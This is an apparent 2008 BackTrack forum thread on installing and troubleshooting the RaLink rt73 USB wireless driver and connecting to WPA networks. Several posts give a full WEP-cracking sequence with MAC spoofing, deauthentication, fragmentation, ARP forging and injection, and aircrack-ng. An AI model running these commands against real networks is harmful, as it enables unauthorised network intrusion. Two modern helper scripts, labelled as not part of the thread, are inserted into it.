Getting the rt73 driver to work in BT3final


0tt0v0nc4t
06-19-2008, 12:04 PM
BT3 final has a few minor issues with our driver that are fairly easy to circumvent and I wanted to share my solutions here. This is a collection of notes and ideas I have put together from my time here and first and foremost I want to thank the community because everything I'm putting here I found from various posts in these very forums. ;)

I would also like to ask you to please remember this is a howto for the RaLink RT73 USB Enhanced Driver. Please keep the discussion in this post relevant and don't ask for support for mundane BT3 tasks.

Now let's begin. It's a good idea to grab a couple of things before we get started. The first thing you need to do is get the BT3 kernel sources (http://www.offensive-security.com/kernel.lzm) (thank you shamanvirtuel for delivering me from my noobedness)
and after that you will need the previous version (http://homepages.tu-darmstadt.de/%7Ep_larbig/wlan/rt73-k2wrlz-2.0.1.tar.bz2) of the aspj driver. (SV yet again infinitely wise)

After you have what you need and you are in BT you can bring down your current interface and driver with

ifconfig rausb0 down
modprobe -r rt73

Then you wanna navigate to your folder with the kernel.lzm and type

lzm2dir kernel.lzm /

Afterward you can go to the driver folder and

make
make install

Now you can bring up the driver and interface with

modprobe rt73
ifconfig rausb0 up

At this point your wireless card is ready to be put to good use. Iwpriv commands and SpoonWep will now work gloriously! If you are looking to crack wep/wpa with our card use SpoonWep or look here (http://forums.remote-exploit.org/showthread.php?p=90339#post90339) for a tutorial on how to do it with the terminal, if you are looking to connect to a wep encrypted AP use wireless assistant, and if you are trying to connect to wpa/wpa2 use these commands.
ifconfig rausb0 up
iwconfig rausb0 mode managed
iwconfig rausb0 essid <Your SSID>
iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2) *WPA2PSK is for this line only
iwpriv rausb0 set WPAPSK=<Your Key>
iwpriv rausb0 set EncrypType=TKIP (or AES)
dhcpcd rausb0
This has worked very well for me and I hope it works for you too. Good luck. :D

thebug
06-20-2008, 04:03 PM
When Bt3 loads it recognizes that the rt73 driver is loaded and sees the rausb0 interface but will not pick up ap's in any program. The fix I have found is to simply

modprobe -r rt73
modprobe rt73

Or even better... Use SpoonDrv. ;)

Please, can you explain what SpoonDrv is? Is it better?

The_Denv
06-22-2008, 12:33 AM
I too have the Edimax EW-7318USg and just like the OP said, it doesn't work out of the box. I also had to modprobe the adapter for it to work.

It doesn't bother me now, but out of curiosity can any of the devs explain the reason why the card doesn't work for BT3 Final? It works on BT3beta out of the box.

speed999
06-22-2008, 04:28 PM
My problem is that I can't get the Edimax EW-7318USg to inject with BT3. I had no problem with BT2 and have searched this forum but most of what I find suggests that it should work out of the box or try:-

iwpriv rausb0 rfmontx 1
iwpriv rausb0 forceprism 1
iwconfig rausb0 mode monitor

Done this but when I try 'aireplay-ng -9 rausb0' against my AP it is a 100% failure, any suggestions would be appreciated.

The_Denv
06-23-2008, 02:54 AM
My problem is that I can't get the Edimax EW-7318USg to inject with BT3. I had no problem with BT2 and have searched this forum but most of what I find suggests that it should work out of the box or try:-

iwpriv rausb0 rfmontx 1
iwpriv rausb0 forceprism 1
iwconfig rausb0 mode monitor

Done this but when I try 'aireplay-ng -9 rausb0' against my AP it is a 100% failure, any suggestions would be appreciated.

Try this:


$ airmon-ng stop rausb0
$ ifconfig rausb0 down
$ macchanger --mac 00:11:22:33:44:55 rausb0
$ airmon-ng start rausb0
$ airodump-ng rausb0
find the bssid
copy the bssid
$ airodump-ng -c 1 -w output --bssid <bssid> rausb0
$ aireplay -1 0 -a paste -h 00:11:22:33:44:55 rausb0
$ aireplay-ng -0 5 -a <bssid> rausb0
$ aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0
answer yes and wait
$ packetforge-ng --arp -a <bssid> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y filename.xor -w arprequest
$ aireplay-ng -2 -r arprequest rausb0
say yes
$ aircrack-ng output-01.cap

0tt0v0nc4t
06-23-2008, 09:35 AM
speed999, The aircrack wiki for our driver (found here (http://www.aircrack-ng.org/doku.php?id=rt73) ) Says to try

iwconfig rausb0 rate 1M


good luck.

speed999
06-23-2008, 12:58 PM
Try this:


$ airmon-ng stop rausb0
$ ifconfig rausb0 down
$ macchanger --mac 00:11:22:33:44:55 rausb0
$ airmon-ng start rausb0
$ airodump-ng rausb0
find the bssid
copy the bssid
$ airodump-ng -c 1 -w output --bssid <bssid> rausb0
$ aireplay -1 0 -a paste -h 00:11:22:33:44:55 rausb0
$ aireplay-ng -0 5 -a <bssid> rausb0
$ aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0
answer yes and wait
$ packetforge-ng --arp -a <bssid> -h 00:11:22:33:44:55 -k 255.255.255.255 -l 255.255.255.255 -y filename.xor -w arprequest
$ aireplay-ng -2 -r arprequest rausb0
say yes
$ aircrack-ng output-01.cap

Tried this but 'aireplay-ng -1 0 -a <bssid> -h 00:11:22:33:44:55 rausb0' fails after 'Sending Authentication Request' with 'Attack was unsuccessful'. This is the same problem I have when using:-

airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0

aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0

aircrack-ng -b <bssid> capturefile*.ivs

I only get to attempting the fake authentication and it fails! No problem with the same attack using BT2.

Tried ‘iwconfig rausb0 rate 1M’

The fake authentication worked but 'aireplay-ng -4 -b <bssid> -h 00:11:22:33:44:55 rausb0' failed 'the access point does not properly discard frames with an invalid ICV.....'

When I used:-

airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0

aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0

Brilliant and thanks it works!

As the attack I have used works on BT2, I don’t think I would have made the link between the Aircrack wiki and BT3 without your help. My knowledge of Unix is almost zero so could I ask another question. The pps looks a bit slow compared with BT2 so if I try increasing the rate from 1M what do you recommend the increments should be?

Thanks again for everyone’s help

The_Denv
06-23-2008, 08:55 PM
<snip>
When I used:-

airodump-ng --ivs --channel 11 --bssid <bssid> -w capturefile rausb0

aireplay-ng -1 0 -e <essid> -a <bssid> -h <edimax> rausb0
aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b <bssid> -h <edimax> rausb0

Brilliant and thanks it works!

As the attack I have used works on BT2, I don’t think I would have made the link between the Aircrack wiki and BT3 without your help. My knowledge of Unix is almost zero so could I ask another question. The pps looks a bit slow compared with BT2 so if I try increasing the rate from 1M what do you recommend the increments should be?

Thanks again for everyone’s help

Well I don't know what the increment should be, but if you increase it by 1dBi each time until it doesn't work, you will find your answer.


iwconfig rausb0 txpower 10


Then increase it by 1dBi each time:

iwconfig rausb0 txpower 11


Lucky for you anyway! All day I have been trying to inject my AP with my Edimax and I can't! LOL!
It gets worse, Back|Track does recognize my card, but I tried a LOT of tricks and it was hit and miss. It took me nearly 3 hours to connect to my AP as the card didn't see any AP's at all!:eek: Then when I set my card into monitor mode to test out the funny EzPWN toolset just for a laugh...it didn't see any APs!

I exited EzPWN and loaded airodump-ng, and it saw the APs. Then I stopped airodump-ng in order to define my AP in airodump and start injecting...nothing, it didn't even see any AP's. I cannot connect to the internet on BackTrack unless I load it, restart it, load it and restart it again. It's very frustrating because it was working perfectly for a while and now I have to hold off my BASE/Snort/With_Graphs tutorial as I'm in Windows as it's the only way I can connect to my AP.

In case anyone is wondering, yes I do have a built in Atheros but I am not in my computer room today and the ath0 is crap from my shed. Any help from anyone on this mysterious rt73 problem would be appreciated.

Okay, I am still in Windows [only way to surf at the moment] and I found this on the Aircrack-ng site:

The instructions below reference an older version of the drivers than is available on ASPj's site. This is because the newer version contains some bugs. See the forum threads for details.


I am going to look into this as soon as I boot back into BT3f

0tt0v0nc4t
06-23-2008, 10:30 PM
I am having strange issues with my card as well. Fortunately I have an Intel Pro Wireless one on a laptop so I have been using that to play around on.

First, with my Edimax 7318 I can crack wep/wpa just fine in command line but I still have had absolutely zero success with SV's SpoonWep (works just fine on laptop with other card). SV had asked me to try installing the rt73-k2wrlz-2.0.1 driver but I have yet to try it.

Second, no matter what I try, I cannot connect to my AP with WPA2 encryption.
My previous working method for connecting with my card in BT is no longer working (see code below) and wireless assistant is fail.

ifconfig rausb0 up
iwconfig rausb0 mode managed
iwconfig rausb0 essid <Your SSID>
iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2)
iwpriv rausb0 set WPAPSK=<Your Key>
iwpriv rausb0 set EncrypType=TKIP (or AES)
dhcpcd rausb0

My next step is to try the previous aspj driver, drop my encryption to wep, and see if I can connect/scan/exploit ok.

Please post your solutions Denv and I will post any I find as well. Thanks.

The_Denv
06-23-2008, 11:35 PM
I am having strange issues with my card as well. Fortunately I have an Intel Pro Wireless one on a laptop so I have been using that to play around on.

First, with my Edimax 7318 I can crack wep/wpa just fine in command line but I still have had absolutely zero success with SV's SpoonWep (works just fine on laptop with other card). SV had asked me to try installing the rt73-k2wrlz-2.0.1 driver but I have yet to try it.

Second, no matter what I try, I cannot connect to my AP with WPA2 encryption.
My previous working method for connecting with my card in BT is no longer working (see code below) and wireless assistant is fail.

ifconfig rausb0 up
iwconfig rausb0 mode managed
iwconfig rausb0 essid <Your SSID>
iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2)
iwpriv rausb0 set WPAPSK=<Your Key>
iwpriv rausb0 set EncrypType=TKIP (or AES)
dhcpcd rausb0

My next step is to try the previous aspj driver, drop my encryption to wep, and see if I can connect/scan/exploit ok.

Please post your solutions Denv and I will post any I find as well. Thanks.

I will do, no sweat man. I'm on Windows at the moment using my Atheros card, it's nearly 5am and I have been awake for more or less 2 days trying to get BASE working. Not a problem, tomorrow I will troubleshoot my Edimax and post my results here. I also have zero success with Wireless Assistant and SpoonWep, of course CL was my first approach and it 'half' worked and hasn't worked since.

speed999
06-24-2008, 03:18 PM
Well I don't know what the increment should be, but if you increase it by 1dBi each time until it doesn't work, you will find your answer.


iwconfig rausb0 txpower 10


Then increase it by 1dBi each time:

iwconfig rausb0 txpower 11


It was ‘rate’ that I was interested in but I gave ‘txpower’ a go and ‘iwconfig’ said ‘Operation not supported’. Tried increments of ‘1M’ with ‘rate’ using ‘aireplay-ng -9 rausb0’. For what it is worth, found 1, 2 and 5 worked well; 3 & 4 and all above 5, with the exception of 9, failed to inject. 9 worked some of the time.

Strange!

The_Denv
06-26-2008, 02:28 PM
Well I don't know what the increment should be, but if you increase it by 1dBi each time until it doesn't work, you will find your answer.


iwconfig rausb0 txpower 10


Then increase it by 1dBi each time:

iwconfig rausb0 txpower 11


It was ‘rate’ that I was interested in but I gave ‘txpower’ a go and ‘iwconfig’ said ‘Operation not supported’. Tried increments of ‘1M’ with ‘rate’ using ‘aireplay-ng -9 rausb0’. For what it is worth, found 1, 2 and 5 worked well; 3 & 4 and all above 5, with the exception of 9, failed to inject. 9 worked some of the time.

Strange!

Ahh, sorry about the txpower command. Apparently it's only supported on Ubuntu; I got the commands mixed up with a different Linux distro. So you are interested in the 'rate'?


$ iwconfig rausb0 rate 54M


Is this what you mean? I am confused as to what you want :confused:

speed999
06-26-2008, 02:44 PM
$ iwconfig rausb0 rate 54M

Yes this was the one. Only tried 1M to 10M and as you can see from my previous post the results suggest that only some rates in this range will work. Not tried anything above 10M; I assume that as it is a 54Mb card it should be possible to use anything up to 54M.

0tt0v0nc4t
06-29-2008, 01:06 PM
Okay... Today I have spent a lot of time with this and I can do everything except for connecting to wpa and Spoonwep. Further investigation has shown that everything works just fine once connected to an open/wep AP, however wpa still refuses to connect. I have tried the iwpriv commands I posted before, as well as some slightly different ones SV had posted in a different thread, and even tried to configure wpa_supplicant.conf (a flailing attempt, I know it doesn't work for our driver but it didn't take long and was worth a shot).

After this I attempted to try different drivers. I downloaded the official one from Edimax and rt73-k2wrlz-2.0.1.tar.bz2, an earlier version of the current driver. This is where my latest problem begins.

I can't seem to do a make install; every time I try to make install the driver (as instructed by the readme) I get the error listed below. I get a similar error when trying to make install the rt73-k2wrlz-2.0.1 driver as well.
bt ~ # cd /usr/src/RT73/2008_0117_RT73_Linux_STA_Drv1.1.0.0/Module
bt Module # ls
Configure connect.c netif_block.h rtmp_type.h
Makefile ifcfg-rausb0 oid.h rtmp_wep.c
Makefile.4 iwpriv_usage.txt rt73.bin rtmp_wext.c
Makefile.6 link_list.h rt73.h rtmp_wext.h
Makefile.CMPC load rt73sta.dat rtusb_bulk.c
Module.symvers md5.c rt_config.h rtusb_data.c
README md5.h rt_user.c rtusb_io.c
ReleaseNote mlme.c rtmp.h sanity.c
STA_iwpriv_ATE_usage.txt mlme.h rtmp_def.h sync.c
assoc.c mlme_ex.c rtmp_info.c unload
auth.c mlme_ex.h rtmp_init.c wpa.c
auth_rsp.c mlme_ex_def.h rtmp_main.c wpa.h
config.mk netif_block.c rtmp_tkip.c
bt Module # cp Makefile.6 ./Makefile
bt Module # make install
make -C /lib/modules/2.6.21.5/build \
INSTALL_MOD_DIR=extra SUBDIRS=/usr/src/RT73/2008_0117_RT73_Linux_STA_Drv1.1.0.0/Module \
modules_install
make: *** /lib/modules/2.6.21.5/build: No such file or directory. Stop.
make: *** [install] Error 2


So now I am stumped, I have exhausted everything in my limited library of knowledge and nothing seems to work. Not even SpoonDrv can seem to download and install a driver. I am low on time today but later tonight I plan to google my make install problem and make sure it's not a common issue.

If anyone has any suggestions I will be glad to hear them and if I come across any solutions I will be sure to post back as well.
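The "No such file or directory" on /lib/modules/2.6.21.5/build in the session above is what the driver Makefile's `make -C /lib/modules/$(uname -r)/build` prints when the kernel build tree is absent, which is exactly what the first post's kernel.lzm step (`lzm2dir kernel.lzm /`) supplies. As an added example (not code from the thread or from the aspj driver), the POSIX shell script below wraps the first post's down/unload, build, load/up sequence with that precondition check. It assumes the aspj tarball is already unpacked in the directory passed as the first argument; rausb0, rt73 and lzm2dir are the names used in the thread, the function names are mine.

```shell
#!/bin/sh
# Added example, not code from the thread: rebuild and reload the aspj rt73
# module on BT3 with the kernel-source check the failed session above lacked.
# Assumptions: the driver is already unpacked in $1; $2 is the BT3 kernel.lzm
# from the first post (defaults to ./kernel.lzm).

IFACE="${IFACE:-rausb0}"   # interface name used throughout the thread
MODULE="${MODULE:-rt73}"   # module name used throughout the thread

# Directory that `make -C ... modules_install` in the driver Makefile needs.
# "make: *** /lib/modules/2.6.21.5/build: No such file or directory" means
# this path is missing, i.e. the kernel sources were never installed.
# $1 overrides the path (used for testing); default is the running kernel's.
kernel_build_dir() {
    printf '%s\n' "${1:-/lib/modules/$(uname -r)/build}"
}

# Succeed only if the build tree exists and carries a top-level Makefile.
have_kernel_sources() {
    dir=$(kernel_build_dir "$1")
    [ -d "$dir" ] && [ -f "$dir/Makefile" ]
}

# Bring the interface down and unload the module, as the first post does
# before rebuilding; errors are tolerated so this works when nothing is loaded.
unload_driver() {
    ifconfig "$IFACE" down 2>/dev/null || true
    modprobe -r "$MODULE" 2>/dev/null || true
}

# Install the kernel sources if they are missing, then build and install the
# module.  $1 = driver directory, $2 = path to kernel.lzm, $3 = build dir
# override (empty means the running kernel's).
rebuild_driver() {
    driver_dir=$1 lzm=${2:-kernel.lzm} build=${3:-}
    if ! have_kernel_sources "$build"; then
        [ -f "$lzm" ] || { echo "no kernel sources and $lzm not found" >&2; return 1; }
        lzm2dir "$lzm" / || return 1    # same command as the first post
        have_kernel_sources "$build" || { echo "build dir still missing" >&2; return 1; }
    fi
    ( cd "$driver_dir" && make && make install )
}

# Load the module and bring the interface back up.
reload_driver() {
    modprobe "$MODULE" && ifconfig "$IFACE" up
}

# Run the whole procedure only when a driver directory is given on the
# command line (paths below are placeholders), e.g.:
#   sh rt73-rebuild.sh /path/to/rt73-k2wrlz-2.0.1 /path/to/kernel.lzm
if [ -n "${1:-}" ]; then
    unload_driver
    rebuild_driver "$1" "${2:-kernel.lzm}"
    reload_driver
fi
```

Everything past the check needs root, as in the thread; the check itself does not, so running `have_kernel_sources && echo ok` first is a cheap way to tell a missing-sources failure from a real compile error before touching the card.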

0tt0v0nc4t
07-04-2008, 12:49 AM
I just edited the original post with all the solutions I have found. The card is working great for me now and I hope everyone finds equal success!

Cortez
07-15-2008, 02:57 PM
Hello
Just wanted to share that i have a Linksys WUSB54G with the rt73 chip and i have used your solution and it works now.
At least i can catch networks, nothing worked before.
Thank you

0tt0v0nc4t
07-18-2008, 10:48 PM
Cortez, thank you for replying. Since I only have an Edimax EW-7318, I did not realize when starting this thread that the rt73 driver was shared by multiple cards. To make things easier I had the name of the thread changed to reflect that this method works for anyone with the same rt73 driver.

alan-smithee
07-19-2008, 06:31 AM
Hello.
I followed the tuto, but when I did

"iwpriv rausb0 set WPA2PSK=(my key)"

it returned

"Interface doesn't accept private ioctl...
set (8BE2) : Invalid argument"

What's the f___ ?

0tt0v0nc4t
07-19-2008, 11:15 AM
My example says...
iwpriv rausb0 set WPAPSK=<Your Key>


and it seems you used
"iwpriv rausb0 set WPA2PSK=(my key)"

You only need to do WPA2PSK for
iwpriv rausb0 set AuthMode=WPAPSK (or WPA2PSK if you are using WPA2)

Try it without the 2 ;)
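The mix-up just above (the key passed as WPA2PSK=, which the driver rejects with "Invalid argument" because WPA2PSK is an AuthMode value, not a key parameter) and the iwpriv sequence from the first post are both covered by this added shell wrapper, which is not code from the thread. It derives AuthMode from the security type, always passes the key as WPAPSK=, spells EncrypType the way the driver expects, and checks the passphrase before touching the card. rausb0 and the iwpriv parameter names come from the thread; the function names are mine, and the 8 to 63 character passphrase / 64 hex digit PSK rule is the WPA standard's, not something the thread states.

```shell
#!/bin/sh
# Added example, not code from the thread: run the first post's iwpriv
# sequence with the parameter names checked up front, so the key can only
# ever be passed as WPAPSK= (WPA2PSK= draws "Invalid argument" from the
# private ioctl, as seen in the thread). rausb0 and the iwpriv parameter
# names are from the thread; SSID, key, security type and cipher are inputs.

IFACE="${IFACE:-rausb0}"

# AuthMode value for the AP's security type. This is the only line that
# differs between WPA and WPA2.
auth_mode_for() {
    case "$1" in
        wpa|WPA)   echo WPAPSK ;;
        wpa2|WPA2) echo WPA2PSK ;;
        *) return 1 ;;
    esac
}

# Cipher value; the parameter is spelled EncrypType (no second t).
encryp_type_for() {
    case "$1" in
        tkip|TKIP)         echo TKIP ;;
        aes|AES|ccmp|CCMP) echo AES ;;
        *) return 1 ;;
    esac
}

# WPA/WPA2 personal accepts a passphrase of 8..63 characters or a raw
# 256-bit PSK written as 64 hex digits (802.11i rule, not from the thread).
psk_valid() {
    key=$1
    len=${#key}
    if [ "$len" -eq 64 ]; then
        case "$key" in *[!0-9A-Fa-f]*) return 1 ;; esac
        return 0
    fi
    [ "$len" -ge 8 ] && [ "$len" -le 63 ]
}

# Dry run: print the exact command sequence with the key masked as <key>.
wpa_commands() {
    ssid=$1 sec=${2:-wpa2} cipher=${3:-AES}
    mode=$(auth_mode_for "$sec") || return 1
    enc=$(encryp_type_for "$cipher") || return 1
    printf '%s\n' \
        "ifconfig $IFACE up" \
        "iwconfig $IFACE mode managed" \
        "iwconfig $IFACE essid $ssid" \
        "iwpriv $IFACE set AuthMode=$mode" \
        "iwpriv $IFACE set WPAPSK=<key>" \
        "iwpriv $IFACE set EncrypType=$enc" \
        "dhcpcd $IFACE"
}

# Real run: validate, then issue the commands (needs root and the rt73 driver).
connect_wpa() {
    ssid=$1 key=$2 sec=${3:-wpa2} cipher=${4:-AES}
    mode=$(auth_mode_for "$sec")     || { echo "security must be wpa or wpa2" >&2; return 1; }
    enc=$(encryp_type_for "$cipher") || { echo "cipher must be TKIP or AES" >&2; return 1; }
    psk_valid "$key" || { echo "key must be 8-63 chars or 64 hex digits" >&2; return 1; }
    ifconfig "$IFACE" up &&
    iwconfig "$IFACE" mode managed &&
    iwconfig "$IFACE" essid "$ssid" &&
    iwpriv "$IFACE" set "AuthMode=$mode" &&
    iwpriv "$IFACE" set "WPAPSK=$key" &&
    iwpriv "$IFACE" set "EncrypType=$enc" &&
    dhcpcd "$IFACE"
}
```

`wpa_commands MySSID wpa2 AES` prints the sequence with the key masked, which is a safe thing to paste into a forum post; `connect_wpa MySSID 'the passphrase' wpa2 AES` runs it. Keeping the key out of the dry-run output also keeps it out of shell history when the sequence is copied around.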

alan-smithee
07-19-2008, 03:35 PM
Holy shit !

This works great !!!

Dude, you're God, thank you very much !

(the last time I tried it, I made a syntax mistake; it's "EncrypType" and not "EncryptType" lol :rolleyes:)

Small Mike
08-07-2008, 01:51 PM
Yeah that works great! Even without the second and third step it works fine on my Advent 9117 using Ralink RT73 USB
Cheers,

-=THX=-
08-27-2008, 06:17 PM
I still cant get it working.
After typing "dhcpcd rausb0", it does something and then stops.
Nothing happens.

Don't get me wrong I'm working for hours on this small problem, but I can't get it fixed. I'm getting frustrated...

wyze
08-27-2008, 07:52 PM
Why the need for a poll? :confused:

pureh@te
08-28-2008, 01:15 AM
Polls suck!:mad:

secure_it
08-28-2008, 01:21 AM
Polls are good only when subject experts are polling. Votes of n00bs are a waste of time and mislead in wrong directions.

0tt0v0nc4t
08-28-2008, 08:27 AM
I added the poll because this is my first tutorial and I wanted to gauge how well it is written. Even if people are super noob and vote that they didn't get it working, it lets me know that maybe I can reword something and make it better. It's far from the mentality of "what is ur fav bt hax" polls

0tt0v0nc4t
08-28-2008, 08:31 AM
Did you install the kernel sources and latest/previous rt73 driver? If so make sure you're doing everything as stated in the tutorial. Also if you are using wpa2 you will need to change this line

iwpriv rausb0 set AuthMode=WPAPSK
to
iwpriv rausb0 set AuthMode=WPA2PSK

secure_it
08-28-2008, 08:50 AM
Did you install the kernel sources and latest/previous rt73 driver? If so make sure you're doing everything as stated in the tutorial. Also if you are using wpa2 you will need to change this line

iwpriv rausb0 set AuthMode=WPAPSK
to
iwpriv rausb0 set AuthMode=WPA2PSK
Since the launch of the aspj 3.0.1 drivers I have been using them. See my tutorial for the various enhancements in the latest rt73 drivers.

http://forums.remote-exploit.org/showthread.php?t=15785

-=THX=-
09-02-2008, 06:10 PM
Yeah thanks finally it works.
I guess my problems started because I was trying to connect to a network with a hidden essid. I still don't know how I can connect to it, though.

Thanks for your Tutorial it really helps.